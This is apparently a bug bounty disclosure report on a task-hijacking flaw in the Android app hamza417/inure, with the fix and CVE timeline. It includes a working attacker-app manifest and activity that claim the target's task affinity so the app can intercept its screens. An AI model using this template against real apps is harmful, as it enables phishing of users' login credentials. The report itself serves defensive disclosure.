We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Android Manifest Misconfiguration Leading to Task Hijacking in hamza417/inure

Valid

Reported on

Aug 20th 2023

Description

Task hijacking allows malicious apps to inherit permissions of vulnerable apps and is usually used for phishing login credentials of victims. This vulnerability applies to all Android versions before Android 11.

Steps To Reproduce:

  1. Victim installs malicious app
  2. Victim starts malicious app (could also be a background service)
  3. Victim opens legitimate app (Inure app) which the malicious app can intercept.

Video Proof of Concept

Video POC

Mitigation

To prevent this attack you will need to set taskAffinity property of the application activities to taskAffinity= "" in the <activity> tag of the AndroidManifest.xml to force the activities to use a randomly generated task affinity, or set it at the <application> tag to enforce on all activities in the application.

Attacker App Code

Android Manifest

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    package="com.m0ck3d.taskhijackingattackapp"
    tools:ignore="ExtraText">

    <application
        android:allowBackup="true"
        android:icon="@drawable/daverage"
        android:label="AttackAppTaskHijacking"
        android:roundIcon="@drawable/daverage"
        android:supportsRtl="true"
        android:theme="@style/Theme.Taskhijackingattackapp"
        android:taskAffinity="app.simple.inure">
        <activity
            android:name=".MainActivity"  android:launchMode="singleTask" android:excludeFromRecents="true"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>

</manifest>

Main Activity

import android.os.Bundle
import android.content.Intent;
import androidx.appcompat.app.AppCompatActivity


class MainActivity : AppCompatActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)

        moveTaskToBack(true);
    }
    override fun onResume() {
        super.onResume()
        setContentView(R.layout.activity_main)
    }
}

Impact

Due to a misconfiguration in the Android manifest file, it was possible to a perform a task hijacking attack. An attacker could create a malicious mobile application which could hijack a legitimate app and steal any potential sensitive information when installed on the victim's device.

We are processing your report and will contact the hamza417/inure team within 24 hours. a month ago
M0ck3d modified the report
a month ago
We have contacted a member of the hamza417/inure team and are waiting to hear back a month ago
M0ck3d modified the report
a month ago
Hamza Rizwan gave praise a month ago
Thanks for the heads-up.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
M0ck3d modified the report
23 days ago
M0ck3d modified the report
23 days ago
Hamza Rizwan validated this vulnerability 23 days ago
M0ck3d has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Hamza Rizwan marked this as fixed in build92 with commit 09762e 23 days ago
Hamza Rizwan has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Sep 10th 2023
AndroidManifest.xml#L107-L585 has been validated
Hamza Rizwan gave praise 23 days ago
Thanks for the heads-up.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
M0ck3d
23 days ago

Researcher

@maintainer @hamza417 Thank you so much !

Hamza Rizwan published this vulnerability 12 days ago
NABEEL
11 days ago

m0ck3d appreciate

to join this conversation